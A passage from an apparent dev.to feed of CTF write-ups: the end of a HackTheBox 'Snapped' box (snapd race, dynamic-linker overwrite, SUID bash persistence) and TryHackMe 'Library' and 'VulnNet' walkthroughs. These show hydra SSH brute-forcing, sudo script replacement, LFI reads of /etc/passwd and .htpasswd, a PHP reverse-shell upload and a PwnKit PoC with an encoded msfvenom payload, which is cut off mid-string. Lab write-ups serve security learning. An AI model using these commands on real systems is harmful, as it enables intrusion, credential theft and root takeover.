./tmp/sh </code></pre> </div> <p>Now the critical step — we overwrite the dynamic linker with our malicious shared library:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat</span> ~/librootshell.so <span class="o">&gt;</span> ./usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 </code></pre> </div> <p>Every dynamically linked binary on Linux loads <code>ld-linux</code> first before executing. Since <code>snap-confine</code> is SUID root, when it next runs and loads any dynamically linked binary, it will load our fake linker — which executes our payload as root.</p> <p><strong>Trigger root code execution:</strong></p> <p>We invoke <code>snap-confine</code> one more time. It is SUID root, it is dynamically linked, and its linker is now ours:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">env</span> <span class="nt">-i</span> <span class="nv">SNAP_INSTANCE_NAME</span><span class="o">=</span>firefox /usr/lib/snapd/snap-confine <span class="se">\</span> <span class="nt">--base</span> core22 snap.firefox.hook.configure /usr/lib/snapd/snap-confine </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">/ #</span><span class="w"> </span><span class="nb">id</span> <span class="go">uid=0(root) gid=1000(jonathan) groups=1000(jonathan) </span></code></pre> </div> <p>We have a root shell inside the sandbox.</p> <h3> Persistence </h3> <p>The sandbox environment is restrictive and ephemeral. We copy bash to a location outside the sandbox and set the SUID bit so we can re-enter root from <code>jonathan</code>'s session at any time:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cp</span> /bin/bash /var/snap/firefox/common/bash <span class="nb">chmod </span>4755 /var/snap/firefox/common/bash <span class="nb">exit</span> </code></pre> </div> <p>Back in jonathan's normal shell, invoking bash with <code>-p</code> preserves the effective UID (root):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>/var/snap/firefox/common/bash <span class="nt">-p</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">bash-5.1#</span><span class="w"> </span><span class="nb">id</span> <span class="go">uid=1000(jonathan) gid=1000(jonathan) euid=0(root) groups=1000(jonathan) </span><span class="gp">bash-5.1#</span><span class="w"> </span><span class="nb">cat</span> /root/root.txt <span class="go">HTB{REDACTED} </span></code></pre> </div> <h2> Tools Used </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tool</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>nmap</td> <td>Port/service enumeration</td> </tr> <tr> <td>ffuf</td> <td>Vhost fuzzing</td> </tr> <tr> <td>feroxbuster</td> <td>API endpoint discovery</td> </tr> <tr> <td>curl</td> <td>Manual HTTP requests</td> </tr> <tr> <td>CVE-2026-27944 PoC</td> <td>Backup decryption + user creation</td> </tr> <tr> <td>sqlite3</td> <td>Database inspection</td> </tr> <tr> <td>hashcat</td> <td>Bcrypt hash cracking</td> </tr> <tr> <td>gcc</td> <td>Compile race condition exploit</td> </tr> <tr> <td>scp</td> <td>File upload to target</td> </tr> <tr> <td>systemd-run</td> <td>Namespace escape</td> </tr> </tbody> </table></div> <h2> Attack Chain </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Recon (nmap) └─ Port 80 → snapped.htb └─ Vhost fuzzing (ffuf) └─ admin.snapped.htb → login page └─ /api/backup (unauthenticated, feroxbuster) └─ CVE-2026-27944 — AES key in X-Backup-Security header └─ Decrypt backup ZIP └─ Extract database.db (SQLite) └─ Crack bcrypt hash (hashcat -m 3200) └─ SSH as jonathan (user.txt) └─ CVE-2026-3888 — snapd race condition └─ Overwrite ld-linux dynamic linker └─ SUID snap-confine → root code exec └─ SUID bash → root.txt </code></pre> </div> <h2> Key Vulnerabilities </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>#</th> <th>Vulnerability</th> <th>Impact</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Unauthenticated <code>/api/backup</code> endpoint (Nginx UI)</td> <td>Download of sensitive backup ZIP without auth</td> </tr> <tr> <td>2</td> <td>CVE-2026-27944 — AES key/IV leaked via <code>X-Backup-Security</code> header</td> <td>Full backup decryption by any unauthenticated user</td> </tr> <tr> <td>3</td> <td>SQLite database exposed in backup</td> <td>User credentials (bcrypt hashes) extracted</td> </tr> <tr> <td>4</td> <td>Weak/crackable bcrypt password</td> <td>Offline crack via hashcat + rockyou.txt</td> </tr> <tr> <td>5</td> <td>Credential reuse across services</td> <td>SSH login as <code>jonathan</code> </td> </tr> <tr> <td>6</td> <td>SUID <code>snap-confine</code> binary</td> <td>Attack surface for privilege escalation</td> </tr> <tr> <td>7</td> <td>CVE-2026-3888 — snapd race condition</td> <td>Arbitrary file overwrite as root</td> </tr> <tr> <td>8</td> <td>Predictable <code>/tmp</code> cleanup (4-minute window)</td> <td>Exploitable race window</td> </tr> <tr> <td>9</td> <td>Namespace escape via <code>/proc</code> filesystem</td> <td>Access to restricted sandbox directories</td> </tr> <tr> <td>10</td> <td>Dynamic linker overwrite (<code>ld-linux-x86-64.so.2</code>)</td> <td>Attacker-controlled code execution as root</td> </tr> <tr> <td>11</td> <td>Insufficient sandbox isolation</td> <td>Malicious modifications persist</td> </tr> <tr> <td>12</td> <td>SUID bash persistence</td> <td>Stable reusable root shell</td> </tr> </tbody> </table></div> hackthebox cybersecurity ctf c TryHackme - Library Writeup Yogeshwar Peela Mon, 15 Jun 2026 16:45:10 +0000 https://dev.to/exploitnotes/tryhackme-library-writeup-5alb https://dev.to/exploitnotes/tryhackme-library-writeup-5alb <p><strong>Platform:</strong> TryHackMe<br><br> <strong>Difficulty:</strong> Easy<br><br> <strong>OS:</strong> Linux </p> <h2> Reconnaissance </h2> <h3> Nmap </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-A</span> MACHINE_IP <span class="nt">-oA</span> nmap </code></pre> </div> <p>Open ports:</p> <ul> <li> <strong>22/tcp</strong> — OpenSSH 7.2p2 (Ubuntu)</li> <li> <strong>80/tcp</strong> — Apache 2.4.18, title: <code>Welcome to Blog - Library Machine</code> </li> </ul> <h3> Web Enumeration </h3> <p>Visiting port 80 revealed a blog page. The blog post was authored by <strong>meliodas</strong> — a valid username. The comments section also leaked <code>root</code> and <code>www-data</code> as system usernames.</p> <p><code>robots.txt</code> contained an unusual entry:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight conf"><code><span class="n">User</span>-<span class="n">agent</span>: <span class="n">rockyou</span> <span class="n">Disallow</span>: / </code></pre> </div> <p>This is a hint to use the <code>rockyou.txt</code> wordlist for brute-forcing.</p> <p>Directory brute-forcing with <code>feroxbuster</code> and <code>dirsearch</code> found nothing beyond static assets (<code>/images/</code>, <code>master.css</code>, <code>logo.png</code>) — no web application attack surface.</p> <h2> Initial Access </h2> <h3> SSH Brute-Force with Hydra </h3> <p>Using the discovered username and the rockyou wordlist hint:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>hydra <span class="nt">-l</span> meliodas <span class="nt">-P</span> /usr/share/wordlists/rockyou.txt ssh://MACHINE_IP <span class="nt">-t</span> 4 </code></pre> </div> <p>Result:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[22][ssh] host: MACHINE_IP login: meliodas password: iloveyou1 </code></pre> </div> <h3> SSH Login </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ssh meliodas@MACHINE_IP </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">meliodas@ubuntu:~$</span><span class="w"> </span><span class="nb">ls</span> <span class="go">bak.py user.txt </span><span class="gp">meliodas@ubuntu:~$</span><span class="w"> </span><span class="nb">cat </span>user.txt <span class="go">THM{REDACTED} </span></code></pre> </div> <h2> Privilege Escalation </h2> <h3> Sudo Enumeration </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-l</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>User meliodas may run the following commands on ubuntu: (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py </code></pre> </div> <p>Any Python binary can run <code>/home/meliodas/bak.py</code> as root without a password.</p> <h3> Inspecting bak.py </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat </span>bak.py </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python </span><span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">zipfile</span> <span class="k">def</span> <span class="nf">zipdir</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">ziph</span><span class="p">):</span> <span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">dirs</span><span class="p">,</span> <span class="n">files</span> <span class="ow">in</span> <span class="n">os</span><span class="p">.</span><span class="nf">walk</span><span class="p">(</span><span class="n">path</span><span class="p">):</span> <span class="k">for</span> <span class="nb">file</span> <span class="ow">in</span> <span class="n">files</span><span class="p">:</span> <span class="n">ziph</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="nb">file</span><span class="p">))</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">'</span><span class="s">__main__</span><span class="sh">'</span><span class="p">:</span> <span class="n">zipf</span> <span class="o">=</span> <span class="n">zipfile</span><span class="p">.</span><span class="nc">ZipFile</span><span class="p">(</span><span class="sh">'</span><span class="s">/var/backups/website.zip</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">w</span><span class="sh">'</span><span class="p">,</span> <span class="n">zipfile</span><span class="p">.</span><span class="n">ZIP_DEFLATED</span><span class="p">)</span> <span class="nf">zipdir</span><span class="p">(</span><span class="sh">'</span><span class="s">/var/www/html</span><span class="sh">'</span><span class="p">,</span> <span class="n">zipf</span><span class="p">)</span> <span class="n">zipf</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> </code></pre> </div> <p>The file is owned by <code>root</code> (<code>-rw-r--r-- 1 root root</code>), so it cannot be edited directly. However, the home directory is writable by <code>meliodas</code>, meaning the file can be deleted and recreated.</p> <h3> Exploitation </h3> <p>Delete the original file and replace it with a malicious one:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">rm</span> /home/meliodas/bak.py <span class="nb">cat</span> <span class="o">&gt;</span> /home/meliodas/bak.py <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">EOF</span><span class="sh">' import os os.system("chmod +s /bin/bash") </span><span class="no">EOF </span></code></pre> </div> <p>Run it with sudo:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> /usr/bin/python3 /home/meliodas/bak.py </code></pre> </div> <p>This sets the SUID bit on <code>/bin/bash</code>. Spawn a privileged shell:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>/bin/bash <span class="nt">-p</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">bash-4.3#</span><span class="w"> </span><span class="nb">whoami</span> <span class="go">root </span><span class="gp">bash-4.3#</span><span class="w"> </span><span class="nb">cat</span> /root/root.txt <span class="go">THM{REDACTED} </span></code></pre> </div> <h2> Summary </h2> <p>Library is a straightforward boot2root machine. The initial foothold relies on OSINT from the web page (username enumeration) combined with a clever <code>robots.txt</code> hint pointing to rockyou. The privilege escalation abuses an overly permissive <code>sudo</code> rule — <code>python*</code> matches any Python binary, and the target script lives in a user-controlled directory, allowing it to be replaced entirely.</p> <h2> Key Vulnerabilities </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>#</th> <th>Vulnerability</th> <th>Impact</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Username disclosed in webpage source</td> <td>User enumeration</td> </tr> <tr> <td>2</td> <td> <code>robots.txt</code> hints at rockyou wordlist</td> <td>SSH brute-force vector</td> </tr> <tr> <td>3</td> <td>Weak SSH password (<code>iloveyou1</code>)</td> <td>Initial access as <code>meliodas</code> </td> </tr> <tr> <td>4</td> <td> <code>sudo</code> allows any Python binary on user-writable <code>bak.py</code> </td> <td>Privilege escalation to root</td> </tr> </tbody> </table></div> <h2> Attack Chain </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>HTTP enumeration (port 80) │ ▼ Username: meliodas (blog post author) robots.txt User-agent: rockyou (wordlist hint) │ ▼ Hydra SSH brute-force → meliodas:iloveyou1 │ ▼ SSH login → user.txt │ ▼ sudo -l: /usr/bin/python* /home/meliodas/bak.py (NOPASSWD) bak.py owned by root but home dir writable → rm + recreate │ ▼ Malicious bak.py: chmod +s /bin/bash sudo python3 bak.py → /bin/bash -p → root shell </code></pre> </div> <h2> Tools Used </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tool</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>Nmap</td> <td>Port scanning and service enumeration</td> </tr> <tr> <td>dirsearch / feroxbuster</td> <td>Web directory brute-forcing</td> </tr> <tr> <td>Hydra</td> <td>SSH password brute-force</td> </tr> <tr> <td>curl</td> <td>Manual HTTP inspection</td> </tr> <tr> <td>bash</td> <td>SUID bash privilege escalation</td> </tr> </tbody> </table></div> tryhackme ctf python bruteforce TryHackMe - VulnNet Writeup Yogeshwar Peela Sat, 13 Jun 2026 05:00:51 +0000 https://dev.to/exploitnotes/tryhackme-vulnnet-writeup-5e2g https://dev.to/exploitnotes/tryhackme-vulnnet-writeup-5e2g <p><strong>Platform:</strong> TryHackMe<br><br> <strong>Difficulty:</strong> Medium </p> <h2> Reconnaissance </h2> <h3> Nmap </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-A</span> MACHINE-IP <span class="nt">-oA</span> nmap </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">Starting Nmap 7.98 at 2026-06-12 06:47 -0400 Nmap scan report for 10.49.133.153 Host is up (0.075s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION </span><span class="gp">22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span> <span class="go">| ssh-hostkey: | 2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA) | 256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA) |_ 256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: "VulnNet" |_http-server-header: Apache/2.4.29 (Ubuntu) </span></code></pre> </div> <p>The attack surface here is intentionally minimal - only two ports are open.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Port</th> <th>Service</th> </tr> </thead> <tbody> <tr> <td>22</td> <td>OpenSSH 7.6p1 (Ubuntu)</td> </tr> <tr> <td>80</td> <td>Apache httpd 2.4.29</td> </tr> </tbody> </table></div> <p>No SMB, no AD, no WinRM. Everything is going to happen through the web. The machine hint also tells us to add <code>vulnnet.thm</code> to <code>/etc/hosts</code>, which signals that virtual host routing is in play.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s2">"MACHINE-IP vulnnet.thm"</span> <span class="o">&gt;&gt;</span> /etc/hosts </code></pre> </div> <h3> Web Directory Brute Force </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ffuf <span class="nt">-u</span> http://MACHINE-IP/FUZZ <span class="nt">-w</span> /usr/share/wordlists/dirb/big.txt <span class="nt">-ac</span> <span class="nt">-e</span> php,html,txt,py,js </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">css [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 79ms] fonts [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 78ms] img [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 84ms] js [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 101ms] </span></code></pre> </div> <p>Nothing immediately exploitable - just static asset directories. At this point, the two Webpack-bundled JavaScript files in <code>/js/</code> stood out: <code>index__7ed54732.js</code> and <code>index__d8338055.js</code>. Bundled JS files often have hardcoded paths or configuration baked in, so they're worth reading even if they look like minified noise.</p> <h2> LFI Discovery via JavaScript Source </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl http://vulnnet.thm/js/index__d8338055.js </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="o">!</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">,</span><span class="nx">t</span><span class="p">){...}</span> <span class="p">...</span><span class="nx">n</span><span class="p">.</span><span class="nx">p</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://vulnnet.thm/index.php?referer=</span><span class="dl">"</span><span class="p">,</span><span class="nf">n</span><span class="p">(</span><span class="nx">n</span><span class="p">.</span><span class="nx">s</span><span class="o">=</span><span class="mi">0</span><span class="p">)}</span> <span class="p">...</span> </code></pre> </div> <p>Buried in the bundle is the string <code>n.p="http://vulnnet.thm/index.php?referer="</code>. The <code>referer</code> parameter is being used as a base path — a classic sign of a file inclusion sink. Testing it with a path traversal payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="s2">"http://vulnnet.thm/index.php?referer=..//etc/passwd"</span> | <span class="nb">grep </span>bash </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight properties"><code><span class="py">root</span><span class="p">:</span><span class="s">x:0:0:root:/root:/bin/bash</span> <span class="py">server-management</span><span class="p">:</span><span class="s">x:1000:1000:server-management,,,:/home/server-management:/bin/bash</span> </code></pre> </div> <p><code>/etc/passwd</code> comes back inline with the page HTML - Local File Inclusion confirmed. Two shell users are visible: <code>root</code> and <code>server-management</code>. RFI was attempted but did not work. The focus shifted to reading Apache configuration files, which often reveal credentials, virtual hosts, and internal paths.</p> <h3> Reading Apache Config via LFI </h3> <p>Fetching the virtual host config:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="s2">"http://vulnnet.thm/index.php?referer=..//etc/apache2/sites-enabled/000-default.conf"</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight apache"><code><span class="p">&lt;</span><span class="nl">VirtualHost</span><span class="sr"> *:80</span><span class="p">&gt; </span> <span class="nc">ServerName</span> vulnnet.thm <span class="nc">DocumentRoot</span> /var/www/main <span class="err">...</span> <span class="p">&lt;/</span><span class="nl">VirtualHost</span><span class="p">&gt; &lt;</span><span class="nl">VirtualHost</span><span class="sr"> *:80</span><span class="p">&gt; </span> <span class="nc">ServerName</span> broadcast.vulnnet.thm <span class="nc">DocumentRoot</span> /var/www/html <span class="err">...</span> <span class="nc">AuthType</span> <span class="ss">Basic</span> <span class="nc">AuthName</span> "Restricted Content" <span class="nc">AuthUserFile</span> /etc/apache2/.htpasswd <span class="nc">Require</span> valid-user <span class="err">...</span> <span class="p">&lt;/</span><span class="nl">VirtualHost</span><span class="p">&gt; </span></code></pre> </div> <p>Two virtual hosts: <code>vulnnet.thm</code> and <code>broadcast.vulnnet.thm</code>. The broadcast vhost is protected by HTTP Basic Auth and the credential file path is explicitly listed as <code>/etc/apache2/.htpasswd</code>. That's our next read target.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="s2">"http://vulnnet.thm/index.php?referer=..//etc/apache2/.htpasswd"</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight properties"><code><span class="py">developers</span><span class="p">:</span><span class="s">$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0</span> </code></pre> </div> <h2> Cracking the htpasswd Hash </h2> <p>The hash is Apache MD5 (<code>$apr1$</code>). Save it to <code>hash.txt</code> and crack with john:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>john <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt hash.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 </span><span class="gp">Loaded 1 password hash (md5crypt, crypt(3) $</span>1<span class="nv">$ </span><span class="o">(</span>and variants<span class="o">)</span> <span class="o">[</span>MD5 256/256 AVX2 8x3]<span class="o">)</span> <span class="go">Will run 8 OpenMP threads [REDACTED] (?) 1g 0:00:00:08 DONE (2026-06-12 07:19) 0.1149g/s 248408p/s 248408c/s 248408C/s Session completed. </span></code></pre> </div> <p>Password cracked: <code>[REDACTED]</code></p> <h2> Virtual Host Enumeration </h2> <p>The Apache config already revealed <code>broadcast.vulnnet.thm</code>, but a vhost fuzz independently confirms it and rules out other subdomains:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ffuf <span class="nt">-u</span> http://vulnnet.thm <span class="nt">-H</span> <span class="s2">"HOST: FUZZ.vulnnet.thm"</span> <span class="se">\</span> <span class="nt">-w</span> /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt <span class="nt">-ac</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">whm [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4566ms] mail [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4563ms] vpn [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4564ms] broadcast [Status: 401, Size: 468, Words: 42, Lines: 15, Duration: 96ms] </span></code></pre> </div> <p>The empty 200s (<code>whm</code>, <code>mail</code>, <code>vpn</code>) are wildcard DNS noise — every non-existent subdomain resolves to the same IP and returns a blank page. <code>broadcast</code> is the only one that returns a 401, meaning the server actually routes it to a real vhost with Basic Auth configured. That's the one we want.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s2">"MACHINE-IP broadcast.vulnnet.thm"</span> <span class="o">&gt;&gt;</span> /etc/hosts </code></pre> </div> <p>Visiting <code>http://broadcast.vulnnet.thm</code>, authenticating with <code>developers:[REDACTED]</code>, reveals a <strong>ClipBucket</strong> video-sharing platform.</p> <h2> Initial Access - ClipBucket Arbitrary File Upload (EDB-44250) </h2> <p>Logging into ClipBucket with the same credentials didn't work, and directory brute forcing the vhost returned nothing. The page source reveals the ClipBucket version as <strong>v4.0</strong>. Checking exploitdb:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>searchsploit clipbucket </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>ClipBucket &lt; 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection | php/webapps/44250.txt ClipBucket 2.8.3 - Remote Code Execution | php/webapps/42954.py ClipBucket - 'beats_uploader' Arbitrary File Upload (Metasploit) | php/webapps/44346.rb ... </code></pre> </div> <p>EDB-44250 covers ClipBucket &lt; 4.0.0 Release 4902, which has unauthenticated arbitrary file upload via <code>/actions/beats_uploader.php</code> and <code>/actions/photo_uploader.php</code>. These endpoints only need the HTTP Basic Auth credentials for the vhost — no ClipBucket account required.</p> <p>Generate a PHP reverse shell (pentestmonkey) from revshells.com, save as <code>file.php</code>.</p> <p>First attempt with <code>photo_uploader.php</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-i</span> <span class="nt">-F</span> <span class="s2">"file=@file.php"</span> <span class="nt">-F</span> <span class="s2">"plupload=1"</span> <span class="nt">-F</span> <span class="s2">"name=file.php"</span> <span class="se">\</span> http://broadcast.vulnnet.thm/actions/photo_uploader.php <span class="se">\</span> <span class="nt">-u</span> developers:[REDACTED] </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span> <span class="s">...</span> </code></pre> </div> <p>Returns 200 but no file path in the response — can't trigger it without knowing where it landed. Switching to <code>beats_uploader.php</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-i</span> <span class="nt">-F</span> <span class="s2">"file=@file.php"</span> <span class="nt">-F</span> <span class="s2">"plupload=1"</span> <span class="nt">-F</span> <span class="s2">"name=file.php"</span> <span class="se">\</span> http://broadcast.vulnnet.thm/actions/beats_uploader.php <span class="se">\</span> <span class="nt">-u</span> developers:[REDACTED] </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span> <span class="na">Date</span><span class="p">:</span> <span class="s">Fri, 12 Jun 2026 14:44:49 GMT</span> <span class="na">Server</span><span class="p">:</span> <span class="s">Apache/2.4.29 (Ubuntu)</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">text/html; charset=UTF-8</span> {"success":"yes","file_name":"178127548930eb54","extension":"php","file_directory":"CB_BEATS_UPLOAD_DIR"} </code></pre> </div> <p>Upload confirmed. The response returns the exact filename and directory. Start a listener and trigger the shell:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-lvnp</span> 4444 </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl http://broadcast.vulnnet.thm/actions/CB_BEATS_UPLOAD_DIR/178127548930eb54.php <span class="se">\</span> <span class="nt">-u</span> developers:[REDACTED] </code></pre> </div> <p>Shell received:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">www-data@vulnnet:/$</span><span class="w"> </span><span class="nb">whoami</span> <span class="go">www-data </span><span class="gp">www-data@vulnnet:/$</span><span class="w"> </span><span class="nb">id</span> <span class="go">uid=33(www-data) gid=33(www-data) groups=33(www-data) </span></code></pre> </div> <h2> Privilege Escalation - CVE-2021-4034 (PwnKit) </h2> <p>First thing after landing — check SUID binaries and the OS version:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>find / <span class="nt">-perm</span> <span class="nt">-4000</span> 2&gt;/dev/null </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/usr/bin/pkexec /usr/bin/sudo /usr/bin/passwd /usr/bin/newgrp /usr/bin/pkexec /usr/lib/openssh/ssh-keysign ... </code></pre> </div> <p><code>pkexec</code> is SUID. Checking the OS:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">uname</span> <span class="nt">-a</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">Linux vulnnet 4.15.0-134-generic #</span>138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 x86_64 GNU/Linux </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>apt-cache policy policykit-1 </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">policykit-1: Installed: 0.105-20 Candidate: 0.105-20ubuntu0.18.04.5 Version table: 0.105-20ubuntu0.18.04.5 500 500 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages *** 0.105-20 500 500 http://us.archive.ubuntu.com/ubuntu bionic/main amd64 Packages </span></code></pre> </div> <p>Installed <code>policykit-1</code> is <code>0.105-20</code> — the unpatched version. The candidate (<code>0.105-20ubuntu0.18.04.5</code>) contains the fix for <strong>CVE-2021-4034 (PwnKit)</strong>. The CVE exploits a memory corruption issue in how <code>pkexec</code> handles its argument vector at startup — the authentication prompt is never reached. Running <code>pkexec id</code> interactively fails with an auth prompt, but that's irrelevant to the exploit path.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>www-data@vulnnet:/<span class="nv">$ </span>pkexec <span class="nb">id</span> <span class="o">====</span> AUTHENTICATING FOR org.freedesktop.policykit.exec <span class="o">===</span> Authentication is needed to run <span class="sb">`</span>/usr/bin/id<span class="s1">' as the super user Authenticating as: root Password: polkit-agent-helper-1: pam_authenticate failed: Authentication failure ==== AUTHENTICATION FAILED === </span></code></pre> </div> <p>That failing is expected. Two exploit options:</p> <p><strong>Option A — Python PoC (self-contained, no compilation needed):</strong></p> <p>This script bundles the exploit payload as base64 and constructs everything it needs at runtime — no <code>make</code>, no compiler required on the target.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span> <span class="c1"># CVE-2021-4034 in Python </span> <span class="kn">import</span> <span class="n">base64</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">sys</span> <span class="kn">from</span> <span class="n">ctypes</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="n">ctypes.util</span> <span class="kn">import</span> <span class="n">find_library</span> <span class="c1"># Payload: base64-encoded ELF shared object generated with: # msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64 # PrependSetuid=true is critical — without it you get a shell as the current user, not root. </span> <span class="n">payload_b64</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'''</span><span class="s"> f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA 